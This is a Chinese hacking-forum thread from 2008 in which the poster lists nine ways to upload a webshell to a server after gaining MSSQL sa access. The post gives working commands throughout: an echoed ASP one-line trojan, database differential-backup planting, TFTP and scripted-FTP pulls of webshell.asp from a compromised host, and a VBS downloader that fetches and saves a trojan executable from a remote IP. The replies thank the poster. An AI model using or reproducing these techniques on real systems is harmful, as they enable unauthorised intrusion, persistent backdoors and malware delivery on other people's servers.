找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 834|回复: 2

SA权限九种上传方法

[复制链接]

14

主题

259

回帖

372

牛毛

一级牛人

积分
372
发表于 2008-10-31 16:57:31 | 显示全部楼层 来自 马来西亚
谢谢楼主分享~楼主满多好资料哦 [s:161]

127

主题

1997

回帖

4346

牛毛

二级牛人

绝情 ! !  !

积分
4346
QQ
发表于 2008-10-31 16:59:06 | 显示全部楼层 来自 广东省
以前搞到SA就不知道怎么利用 !现在来补习下!

56

主题

201

回帖

360

牛毛

一级牛人

积分
360
 楼主| 发表于 2008-10-31 16:54:12 | 显示全部楼层 |阅读模式 来自 山东省潍坊市
SA权限九种上传方法
SA权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家提出,技术越辩起明,越明越高。
一、NBSI的命令方法:写入一句话木SHELL,命令如下: echo ^<25%execute request(\"#\")25%^> >d:\\web\\mm.asp这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop \"服务名\"可以停掉服务。
二、NBSI3。0自带文件上传功能,也可以使用。缺点速度慢。建议上传短小的WEBSHELL。
三、把一句话木马与入数据库,然后利用NBSI数据库差异备份功能。
四、如网站有论坛且开放上传附件功能,可直接在论坛上传文件(把WEBSHELL改成可能上传的文件类型,如JPG,GIF)
五、利用NBSI等注入工具,浏览网站数据库连接文件(前提数据库和WEB在一台机器上,可利用IPCNFIG /ALL命令判断)找出SA的连接密码。利用MSSQL2000自带的事件查询分析器,连数库机器,通过浏览数据库找出后台密码,如果是MD5可利用UPDATE语句进行更改也可利用INSERT加入一新用户,不用在爆破MD5,进入后台,寻找上传WEBSHELL方法。
六、tftp命令法: TFTP [-i] host [GET | PUT] source [destination]首先在自己的机器或已经控制的肉鸡上开TFTP服务,工具:TFTP32.EXE不错。比如:肉鸡IP:192.168.1.1 具有SA权限的机器是192.168.1.2 执行命令: tftp -i 192.168.1.1 get webshell.asp d:\\web\\webshell.asp 如果成功,就会在192.168.1.2的D盘web 目录下生成文件:webshell.asp
七、ftp方法:前提是有一个可访问的外网FTP空间().命令ECHO命令,前面讲的方法:在目标机器上生成文件ftp.txt
echo open www.ftp.com>ftp.TXT //连接FTP
echousername>>ftp.TXT //输入用户名
echopassword>>ftp.TXT //输入密码
echo get webshell.asp d:\\web\\webshell.asp>>ftp.TXT //执行下载命令
echo bye>>ftp.TXT //退出
ftp -s:ftp.txt//执行FTP.TXT文件中的FTP命令
八、vbs脚本方法:
利用ECHO命令写入文件: get.vbs,内容如下:
On Error Resume Next
Dim iRemote,iLocal
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = createObject(\"Microsoft.XMLHTTP\")
xPost.Open \"GET\",iRemote,0
xPost.Send()
Set sGet = createObject(\"ADODB.Stream\")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
然后命令行下执行:cscript get.vbs http://ip/muma.exe c:\\muma.exe
九、start命令法,此方法不常用,但也是一种方法,
start http://ip/a.html这候a.html文件以及它包括的图片会保存在机器的,如果我们把自己的程序改名为a.jpg嵌套在a.html中这时候可以下载到IE缓存中。可以利用dir /s a*.jpg进行搜索。如搜索到,可以利用COPY命令复制出来。
如果大家还有什么好方法可以发帖共享,恭候佳音!^_^
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-16 16:13 , Processed in 0.125444 second(s), 31 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表